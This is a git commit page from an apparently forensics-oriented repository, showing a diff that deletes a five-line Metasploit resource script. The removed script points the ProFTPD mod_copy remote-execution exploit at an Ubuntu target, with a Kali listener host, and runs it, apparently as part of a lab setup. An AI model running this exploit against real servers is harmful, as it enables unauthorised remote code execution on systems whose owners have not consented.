diff options
| author | jerome <jerome@xlinfo.fr> | 2023-11-17 02:42:44 +0100 |
|---|---|---|
| committer | jerome <jerome@xlinfo.fr> | 2023-11-17 02:42:44 +0100 |
| commit | 54ee4d0d823a3e67945d4c50a3e9707da7d0cb03 (patch) | |
| tree | 957f00cfe0fe9c20782089a2e8b1372d37791f1b | |
| parent | 5f4504017de0bb6ccedd4d3adb0a8dd8e4acf7a6 (diff) | |
| download | forensic-54ee4d0d823a3e67945d4c50a3e9707da7d0cb03.tar.gz forensic-54ee4d0d823a3e67945d4c50a3e9707da7d0cb03.zip | |
dump mémoire
| -rw-r--r-- | malware/ub1404.rc | 5 |
1 files changed, 0 insertions, 5 deletions
diff --git a/malware/ub1404.rc b/malware/ub1404.rc deleted file mode 100644 index 2f98e7c..0000000 --- a/malware/ub1404.rc +++ /dev/null @@ -1,5 +0,0 @@ -use exploit/unix/ftp/proftpd_modcopy_exec -set RHOSTS ip_ubuntu -set LHOST ip_kali -set SITEPATH /var/www/html -exploit |
